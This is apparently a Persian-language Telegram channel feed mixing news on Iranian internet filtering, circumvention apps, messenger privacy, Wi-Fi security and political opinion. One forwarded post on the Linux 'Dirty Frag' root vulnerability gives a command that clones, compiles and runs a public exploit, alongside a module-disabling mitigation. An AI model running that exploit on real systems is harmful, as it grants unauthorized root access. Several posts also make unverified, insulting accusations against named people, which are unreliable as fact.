آریاسل
365 subscribers
3.68K photos
728 videos
42 files
1.35K links
اطلاع رسانی از همه ی انواع اجتماعی، سیاسی، تکنولوژیکی، هوش مصنوعی، تلفن همراه و بازار IT و امنیت داده ها
در آریاسل 😎
Download Telegram
در سال ۲۰۱۷ کانال مملکته خبری رو کار کرد در مورد خانواده ی شکوری مقدم و در راس اونها "محمدجواد شکوری مقدم" مدیرعامل آپارات!
توی لینک زیر میتونید ببینید:

https://t.me/mamlekate/35318

سال ۲۰۱۷ یعنی ۹ سال پیش! همون موقع اصلا مردم هیچ عکس العملی نشون ندادن!
این وسط همین ممجواد هم کلی ننه من غیربم بازی در آورد و مثلا به زندان متهم شد و هزار چیز دیگه!

همین ممجواد تو خیلی از پروژه ها بوده و همین ممجواد پای رسول جلیلی رو در شرکت خودش " امن افزار گستر شریف " باز کرده!

خلاصه که باید یاد بگیریم قبل از وقوع واقعه چاره کنیم هر چند الان دیگه توی واقعه هستیم و بیرون اومدن ازش هزارتا داستان داره ...

خواستم بدونین بابتِ هر کیلوبایتی که از سر ناچاری با مشاهده در آپارات مصرف میکنید، دارید جیب کیو پر میکنید!

الان هم البته خبر از خانواده ی خرازی و تغییر فامیلی اونها از خرازی به آقامیر، برای طراحی و کنترل شبکه پولی که میشن بنیانگذاران نوبیتکس!

همشون موجوداتی هستن با ظاهری گوگولی و باطنی هیولایی که شاخ هم ندارن!

#استمرار_طلبان
#فیلترینگ
#فیلترنت
#آپارات

دوستانتون رو به کانال ما دعوت کنید
#آریاسل

🌐 @ariacell 📡
💔2🤯1🤬1
🚀 نسخه تست همگانی کلاینت VPN وایت‌دی‌ان‌اس منتشر شد

🔽لینک دانلود سرور داخلی
https://uplod.ir/i7zea22zumur/WhiteDNS.zip.htm
https://uploadb.com/pykmzh0af81s/File.zip.html


در این نسخه از WhiteDNS، هسته ارتباطی روی StormDNS ساخته شده و ما تا جای ممکن آن را برای شبکه‌های محدود، ناپایدار و پر اختلال بهینه کرده‌ایم.

برای اتصال، نیازی به وارد کردن سرور، کلید یا تنظیمات پیچیده ندارید. فقط کافی است Resolverهای خودتان را وارد کنید یا از لیست آماده داخل برنامه استفاده کنید. اپلیکیشن Resolverها را تست می‌کند، مسیرهای سالم را پیدا می‌کند و سپس به صورت خودکار اتصال را برقرار می‌کند.

قابلیت‌های فعلی:

اتصال Full System VPN برای کل گوشی
حالت Proxy Only برای استفاده دستی
استفاده از چندین سرور داخلی WhiteDNS
تست خودکار Resolverها قبل از اتصال
امکان استفاده از لیست آماده Resolverها
تنظیمات پیشرفته MTU برای شبکه‌های سخت‌تر
نمایش سرعت دانلود، آپلود و مصرف کل دیتا
لاگ اتصال برای بررسی خطاها و وضعیت کانکشن
بدون نیاز به وارد کردن کلید یا دامنه توسط کاربر

اگر روی اینترنت شما اتصال سخت برقرار می‌شود، می‌توانید مقادیر MTU را تغییر دهید تا مسیرهای بیشتری شناسایی شوند و اتصال پایدارتر شود.

⚠️ این اپلیکیشن هنوز نسخه تست اولیه است.
ممکن است روی بعضی دستگاه‌ها یا بعضی اپراتورها نیاز به تنظیمات بیشتر داشته باشد.

لطفاً تست کنید و نتیجه، خطاها و پیشنهادهای خودتان را برای ما بفرستید تا نسخه‌های بعدی سریع‌تر و پایدارتر شوند.

Powered by WhiteDNS
https://t.me/whitedns
1
خبر تلخ امروز...
سوپر اپلیکیشن ایتا دیگ کاربر جدید نمیگیره. 😁😁😁😁😁
😁5
آریاسل
خبر تلخ امروز... سوپر اپلیکیشن ایتا دیگ کاربر جدید نمیگیره. 😁😁😁😁😁
جا نداره دیگه .
یکم کاربرا چِفت بشینن، صمیمی بشینین داداشام 😁😁😁😁
خیلی دوس دارم تو کانال فحش رو باز کنم بهشون مستقیم فحش بدم ☺️😁
🤣7
⚠️خطرات Sync شدن Contact ها در پیام‌رسان‌های بومی و غیربومی

◀️در گروه Ping بحثی مطرح شد در مورد ریسکهای امنیتی پیام‌رسانها. در خلال بحث، این مطلب را آوردم که خالی از لطف ندیدم که برای استفاده عموم اینجا هم منتشر شود:

«نکته تلخ تر اینه که شما وقتی یک پیام‌رسان نصب میکنی در اولین گام contact ها رو سینک میکنه. همین میتونه بسیار خطرناک باشه؛ چون این فرآیند در عمل فقط یک آپلود شماره تلفن ساده نیست، بلکه انتقال یک دیتاست غنی از metadata است. هر مخاطب شامل چند لایه اطلاعاتی است: شماره، نام ذخیره‌شده (label)، الگوی نام‌گذاری، گروه‌بندی ذهنی کاربر و حتی گاهی توضیحات تکمیلی. این برچسب‌ها از نظر تحلیلی بسیار ارزشمندتر از خود شماره هستند، چون مستقیماً توسط انسان تولید شده‌اند و حاوی معنا (semantic meaning) هستند. در واقع کاربر بدون اینکه متوجه باشد، در حال برچسب‌گذاری (labeling) شبکه انسانی خودش برای یک سیستم تحلیلی است.
در مرحله بعد، این داده‌ها وارد فرآیندهای Graph Analytics و Social Graph Construction می‌شوند. پلتفرم با کنار هم قرار دادن contactهای میلیون‌ها کاربر، یک گراف عظیم از ارتباطات انسانی می‌سازد که در آن هر نود یک فرد و هر یال یک رابطه احتمالی است. با استفاده از تکنیک‌هایی مثل community detection، centrality analysis و link prediction می‌توان فهمید چه کسانی در یک خوشه (cluster) قرار دارند، چه افرادی نقش هاب دارند و چه ارتباطاتی هنوز برقرار نشده ولی با احتمال بالا وجود دارند. حتی اگر شما اطلاعات حساسی را مستقیماً وارد نکرده باشید، از طریق inference و تحلیل همبستگی‌ها، سیستم می‌تواند ویژگی‌های پنهان را استنتاج کند؛ مثلاً نوع روابط، سطح نزدیکی، یا ساختارهای اجتماعی اطراف شما.
ریسک زمانی جدی‌تر می‌شود که این گراف با سایر داده‌ها ترکیب شود؛ مثل behavioral data (الگوی استفاده از اپلیکیشن)، device fingerprinting، لوکیشن و زمان‌بندی ارتباطات. در این حالت، یک پروفایل چندبعدی (multi-dimensional profile) از هر فرد ساخته می‌شود که امکان target profiling و predictive modeling را فراهم می‌کند. این یعنی سیستم می‌تواند پیش‌بینی کند چه کسی به چه نوع پیامی پاسخ می‌دهد، به چه کسی اعتماد دارد و بهترین مسیر برای رسیدن به او چیست. چنین دانشی بستر ایده‌آلی برای spear phishing، social engineering و حملات مبتنی بر فریب است، چون مهاجم (یا هر تحلیل‌گر داده) می‌تواند پیام‌هایی طراحی کند که از نظر ساختار، لحن و زمینه کاملاً شبیه ارتباطات واقعی باشند.
این موضوع صرفاً یک ریسک تئوریک نیست، بلکه یک مدل شناخته‌شده در دنیای تحلیل داده و امنیت اطلاعات است. چیزی که به ظاهر یک قابلیت ساده برای «پیدا کردن مخاطبین» است، در واقع یک مکانیزم قدرتمند برای استخراج Human Intelligence (HUMINT) در مقیاس وسیع است. کاربر با هر بار سینک کردن contactها، ناخواسته در حال تغذیه یک سیستم تحلیل شبکه‌ای است که می‌تواند روابط، ساختارها و الگوهای رفتاری را با دقت بالا بازسازی کند؛ و همین نقطه‌ای است که راحتی استفاده، به یک سطح جدی از ریسک تبدیل می‌شود.
همه این اطلاعات و تحلیل‌ها فقط با نصب پیامرسانها اتفاق میفته بدون حتی ارسال یک پیام! حالا شما ببینید کسی که زار و زندگی و عکسها و اطلاعات خودش رو از صبح تا شب توی پیامرسانها منتشر میکنه اوضاعش چطوره! این هم در مورد پیام‌رسان های بومی صادقه و هم بین المللی. بومی ها یک جور تحلیل و استفاده میکنن خارجی ها جور دیگه. واقعیت اینه که ما در اتاقهای شیشه ای داریم زندگی می کنیم جایی برای مخفی شدن نیست.
⬛️پ. ن: با تشکر از AI جهت همکاری در غنی سازی این پست، 🙃»/ پینگ

پ.ن : من که انقدر گفتم تو این سالها زبونم مو دراورد ولی مردم ما کلا به این موارد توجهی ندارن. بسیاری از سرقت ها، قتل ها، بازداشت ها، اعدام ها و موارد دیگه ناشی از همین بی توجهی هاست البته در بستر پیامرسانهای بومی!

سعی کنید از نسخه ی وبِ اپلیکیشن هایی که اعتماد ندارید استفاده کنید ...

#هک
#امنیت
#پیامرسان

دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
👍2
thefeed-android-v0.14.6-arm64-v8a.apk
8 MB
thefeed-android-v0.14.6-arm64-v8a.apk

📊 Size: 8.0 MB
🔐 SHA256:
35bd6845222ff9f9a28329544b75287e74d09d774b56a3fe175ac430b1a80ab4

Developed by https://t.me/CluvexStudio


این برنامه thefeed برای دسترسی به اخبار بین المللی ایرانی هست که توسط توسعه دهندگانِ جوانِ ایرانی که از دسترسی به اینترنت آزاد محروم موندن برای دسترسی به اخبار آزاد طراحی شده .
یکی از شاهکارهای دیگه از بهترین و خلاق ترین مهندسان امنیت و شبکه و توسعه ی نرم افزار برای دسترسی به اینترنت آزاد در بدترین و کمترین شرایط دسترسی به اینترنت بین الملل ...

این نسخه از دِفید تقریبا کامل شده و میتونه ویدیو و عکس های اخبار رو هم از کانال های مهم تلگرامی یا صفحات کاربری x استخراج کنه ...

توضیحاتم مبهمه میدونم .
این برنامه رو نصبش کنید : تا بدونِ vpn از اخبار دنیا مطلع باشید برای تنظیمات اضافه به کانال سازندش وارد بشید و امکاناتش رو یاد بگیرید :
https://t.me/networkti

واقعا شاهکاره ...
کانفیگ های دفید رو از اینجا بگیرید :

https://t.me/thefeedconfig/23

#دفید
دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
2
اگر دسترسی به اینترنت دارید یا دیپ سیک دارید یا کتابهای تاریخیِ مربوطه رو دارید :

۱.داستان زندگی شاه اسماعیل صفوی رو بخونید ...

۲. داستان روزهای آخر شاه سلطان حسین صفوی رو بخونید ...

۳. این روزهای ج.ا رو ببینید ‌‌...

عدد سه انگار فقط یه بازی لفظی نیست ...

هوشیار بودن و تاریخ خوندن رو توصیه میکنم ... همیشه همه ی اِلِمانها یکجور تعبیر نمیشه ولی با نگاه کلی و ساختاری تقریبا همون اتفاقات در حال رخ دادنه ...

تاکید می کنم که من تاریخ دان نیستم و هر آنچه به ذهنم رسیده فقط یک مقایسه ی زمانی و بررسیِ بزنگاه های تاریخیه! فقط همین ...


#تاریخ
#نظر_شخصی
👍2🔥21
بارهای توی محفل های دوستانه گفتم : ج .ا هر کاری میکنه اول یه شمشیر کاتانا به وجود خودش میزنه بعد یه چاقو ضامن دار به دیگران نشون میده ...انقدر بی‌فکر و بی‌منطق رفتار کردن تو این ۴۷ سال !

#نظر_شخصی
👍4
نکنه بسیار مهم امنیتی: وقتی متن کامل پیامکی که دریافت کردید رو شیر کنید به راحتی میتونن شماره تلفن و هویتتونو پیدا کنند. چون احتمالا فقط یک نفر اون ترکیب خاص کلمات و دریافت کرده یه سرچ ساده میکنن و همه چیتون در میاد. بدترم میشه چون اکانت سوشالتون هم وصل میشه به بقیه اطلاعات.

#امنیت
#اوسینت

دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
🔥2
این مساله کپی فیل اینقدر مهم بود که فکر کردم سعی کنم کاملا فنی توضیحش بدم. ویدئو سه تا مفهومی که باعث شدن در ترکیبشون بشه یه یوزر معمولی دسترسی روت بگیره رو توضیح می ده. جالبیش هم اینه که هر سه تا مفهوم، منطقی و معقول هستن ولی ترکیبشون باعث شده بشه چنین حمله ای درست کرد! / جادی

https://youtu.be/0GUEoWEDqlo


لینک دانلود داخلی


#امنیت
#هک
#لینوکس

دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
🔥1
دیجی‌کالا خیلی اوقات در رابطه با خسارت‌هایی که بصورت مستقیم و غیرمستقیم به مشتریان و تامین‌کنندگان وارد میکنه پاسخگو نیست، اما در شرایط جنگی از طرف سرویس دیجی‌پی بخاطر ۲۰ روز تاخیر در پرداخت قسط اظهارنامه قضائی میفرسته؟/ IRCF

پ.ن : تو این اوضاع رحم و مروت که ندارن هیچ پیگیر تر هم هستن .... البته کم کم باید این اوضاع خرخره ی این کسب و کارهای رانتی رو هم بگیره ...

#دیجیکالا

دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
👍4
توسعه‌دهنده اپ SlipNet متاسفانه از توقف توسعه این اپ کاربردی خبر داده و در بخشی از توضیحاتش در مورد علت این تصمیم، نوشته که "توسعه ابزار آزاد، رایگان است اما بی‌هزینه نیست. متأسفانه در جامعه نرم‌افزاری ما، فرهنگ Donation هنوز جایگاه خود را پیدا نکرده است. از سوی دیگر، جنگیدن همزمان در دو جبهه (فیلترینگ از یک سو و خشم و کامنت‌های تند برخی کاربران در روزهای اختلال شبکه از سوی دیگر) توان ادامه مسیر را از من سلب کرد"./ IRCF

پ.ن : کاربران غرغروی مدعیِ ایرانی و مَثَل دو قورت و نیمِ باقی 😁
ولی انصافا حیف شد خیلی حیف شد ... هر روز مهندسان شبکه و امنیت بیشتری آسیب های جدی میبینن ... تجربه ی دوستمون رو در عرصه های مختلف داشته و دارم متاسفانه ...

#اسلیپنت


دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
💔6😱1💊1
این کانال‌هایی که هر روز کلی پروکسی میذارن، منظورشون از «متصل منطقه‌ای»، احتمالا منطقه ایران نیست.

منبع : PythonAi
دوستانتون رو به کانال ما دعوت کنید
#برای_ایران 🖤
#آریاسل

🌐 @ariacell 📡
🤣2
چند تا از شرکت‌های بزرگ مثل Google، Microsoft و xAI با U.S. Department of Commerce به توافق رسیدن که قبل از انتشار عمومی مدل‌های جدید AI، یه دسترسی زودتر به دولت بدن.

اینجوری دولت می‌خواد قبل از اینکه این مدل‌ها دست همه برسه، بررسی کنه ببینه چقدر امنن و چه ریسک‌هایی دارن.

یعنی به‌نوعی دارن یه لایه نظارت اضافه می‌کنن تا جلوی مشکلات احتمالی AI قبل از پخش گسترده گرفته بشه.

منبع : PythonAi
دوستانتون رو به کانال ما دعوت کنید
#برای_ایران 🖤
#آریاسل

🌐 @ariacell 📡
🔥2
می‌دونم الان آمادگی روحیشو ندارید ولی رمزنگاری معروف WPA2 که روی مودم هممون هستش ناامنه:) هکر میتونه بسته هارو ضبط کنه بعدا باهاش ور بره و به صورت آفلاین رمز رو پیدا کنه که توی WPA3 این مشکلو با یه فرمول ریاضی به اسم دراگونفلای حل کردن و هکر حتما باید رمز رو به مودم بفرسته و مودمم ببینه زیاد داره تست میکنه هکرو بَنِش یا کندش میکنه./ لینوکسور

#هک
#امنیت
#مودم
#wpa2

دوستانتون رو به کانال ما دعوت کنید
#برای ایران 🖤
#آریاسل

🌐 @ariacell 📡
😇2
Forwarded from gooyban🦆
بازهم آسیب‌پذیری تمام لینوکس‌ها از ۲۰۱۷: Dirty Frag

آسیب‌پذیری تازه‌ای در ادامه‌ی Dirty Pipe و Copy Fail پیدا شده، که با ترکیب دو باگ امنیتی (xfrm-ESP و RxRPC در Page Cache) در بسیاری از توزیع‌ها می‌تونه دسترسی root بگیره.

می‌تونید روی سیستم خودتون هم امتحانش کنید:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

پس از اینکه انجامش دادید، Page Cache شما آلوده شده با اجرای دستور:
echo 3 > /proc/sys/vm/drop_caches

یا ری‌استارت کردن سیستم به حالت پیش برگردونیدش.

راهکار:
تا پچ امنیتی برای توزیعتون بیاد می‌تونید با این دستور ماژولهایی که این آسیب‌پذیری در اونها وجود داره را غیرفعال کنید و Page cache را پاک کنید:

sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"


روی این سیستم‌ها تا الان تست شده و آسیب‌پذیر بودند:
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64


اگه شبیه CopyFail به نظر میاد خودشون گفتن که:
ایده شروع این تحقیق از آسیب‌پذیری Copy Fail گرفته شده. به‌طور مشخص، بخش xfrm-ESP در زنجیره آسیب‌پذیری Dirty Frag از همان نقطه ضعف مشابه Copy Fail استفاده می‌کند. اما تفاوت مهم این است که این آسیب‌پذیری مستقل از وجود ماژول algif_aead فعال می‌شود.

به عبارت دیگر، حتی اگر روی سیستم راهکار شناخته‌شده مقابله با Copy Fail (مثل غیرفعال کردن algif_aead) اعمال شده باشد، باز هم لینوکس شما در برابر Dirty Frag آسیب‌پذیر باقی می‌ماند.


⌨️ توضیحات بیشتر در گیت‌هاب

تمام این اتفاق‌ها داره در زمانی میوفته که اینترنت ایران همچنان قطعه، سیستم‌ها به روز نشدند، با خبر شدن از این باگ‌ها و برطرف کردنشون به مراتب سخت‌تر خواهد بود.

✈️ به این لیست (از کانال سهراب) Dirty Frag را هم اضافه کنید.


🎮 @gooyban
Please open Telegram to view this post
VIEW IN TELEGRAM
دوستانی سیمکارت پرو میگیرید و فکر میکنید همه چیز روبراه شده و کسی چیزی نمیدونه!

بعدش که گرفتید میدونید که فقط اسمتون تو لیستی رفته که یک مملکت بخاطر حقوق شخصیشون سرگردونن ...

خلاصه که ایام اینطور نبوده و اینطور نخواهد ماند ...

من و ما و امثال ماها که کار، مشغله و تخصص و روزی و دردسرهامون پشت کامپیوتره یا به زور وصل میشیم یا با کانفیگ‌گیگی ۴۰۰ ۵۰۰ تومنی که تهش بدونیم خودِ مردم هستیم ما .
با اینکه ۱۰۰ درصد این امکان چُسَکی رو قبل از شماها به ما پیشنهاد دادن...

نه مثل شما شنقل شقله هایی که کل فایدتون برای این مملکت یه کاسه جویِ اضافست ...!

شمایی که تن به این اوضاع دادی قطعا کار بیخ پیدا کنه تن به کار دیگه هم میدی ...

از این به بعد هر کسی سیمکارت پرو داشته باشه و من بدونم از طرف خودم کلا تحریمه ... اگر بفهمم بعد از هر کاری که انجام دادم کل سرویسش رو معلق میکنم با مسئولیت خودم ...

بشاشید تو رفاقت با دوستهای این مدلی تا وقتی سر و تنشون رو از خون مردم بشورن!

#نیما عبدلله سابق! 😁(اینجا گذاشتم که نشونه باشه برا بعد )
#سیمکارت_پرو
#تف_تو_غیرتتون
#نظر_شخصی

من کوتاه نمیام از این اوضاع : به من میگه برا من بیا از منبر پایین شروور نگو!

ک...مشنگ تو با اینترنت پرو میخواستی پورنهاب ببینی تهش که برا اون باز باید وی پی ان بزنی😉 بیخیال جون من ...
👏32🔥2🫡1
⭕️ آپدیت بزرگ تلگرام: ورود دستیار هوشمند به پروفایل شخصی!

تلگرام در آپدیت جدید تمرکز ویژه‌ای روی هوش مصنوعی داشته است. در ادامه مهم‌ترین تغییرات این نسخه را مرور می‌کنیم:

🔹 ربات‌های مهمان: فراخوانی ربات‌ها در هر چت یا گروهی، تنها با تگ کردن آیدی و بدون نیاز به افزودن آن‌ها.

🔸 منشی شخصی هوشمند: قابلیت اتصال مستقیم یک ربات به پروفایل شخصی تا در غیاب شما به پیام‌ها پاسخ دهد!

🔹 تعاملات زنده هوش مصنوعی: تایپ و نمایش لحظه‌ای پاسخ ربات‌ها، به همراه قابلیت جدید ارتباط ربات با ربات برای انجام وظایف پیچیده‌تر.

🔸 امکانات جدید برای کانال‌ها و تولید محتوا: قابلیت محدود کردن نظرسنجی‌ها (بر اساس کشور یا عضویت در کانال)، مشاهده نمودار آرا، و همچنین ساخت استایل‌های متنی سفارشی.

🔹اضافه شدن قابلیت انتخاب فونت از سیستم خودتون (میتونید فونت وزیر رو نصب کنید و استفاده کنید).

با این به‌روزرسانی که شامل جستجوی هوشمند ایموجی‌ها، ارسال بی‌صدای پیام زمان‌بندی‌شده و رفع ۲۰۰ باگ فنی است، تلگرام قدم بزرگی برای ادغام کامل پیام‌رسانی انسان و هوش مصنوعی برداشته است/ آقاپور

#تلگرام
#برای_ایران 🖤
#آریاسل

🌐 @ariacell 📡
3🔥1